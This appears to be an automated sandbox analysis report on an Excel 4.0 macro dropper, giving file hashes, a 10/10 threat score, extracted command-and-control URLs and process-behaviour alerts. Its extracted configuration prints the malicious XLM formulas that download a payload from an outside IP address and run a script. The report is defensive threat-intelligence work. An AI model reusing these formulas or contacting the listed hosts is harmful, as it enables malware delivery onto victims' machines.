General

  • Target

    f6e90af5e9bec267c8aab9d3962be463

  • Size

    6KB

  • Sample

    231222-t61xnahhgk

  • MD5

    f6e90af5e9bec267c8aab9d3962be463

  • SHA1

    7f7d5d691148e44815dd46d6286f3befa9acba97

  • SHA256

    2e5fa0a8e3d718fd20cd2fea531ac3a40ca19c4a97b30943ef46c6b5da00753b

  • SHA512

    eb42d7ec3097ca2eacbc816a7fee7c26df88037fabfd4b87550c041a76d74df254551d898c97935c42e67e7bff794b42bdf80dd2713dbebeaf896ce0b694a09e

  • SSDEEP

    192:NDS1uSnbrA2OmmfRe8UhHFBFYu4b98y/v+kw:NCuUM2wc1FY9b98y/2

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      f6e90af5e9bec267c8aab9d3962be463

    • Size

      6KB

    • MD5

      f6e90af5e9bec267c8aab9d3962be463

    • SHA1

      7f7d5d691148e44815dd46d6286f3befa9acba97

    • SHA256

      2e5fa0a8e3d718fd20cd2fea531ac3a40ca19c4a97b30943ef46c6b5da00753b

    • SHA512

      eb42d7ec3097ca2eacbc816a7fee7c26df88037fabfd4b87550c041a76d74df254551d898c97935c42e67e7bff794b42bdf80dd2713dbebeaf896ce0b694a09e

    • SSDEEP

      192:NDS1uSnbrA2OmmfRe8UhHFBFYu4b98y/v+kw:NCuUM2wc1FY9b98y/2

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks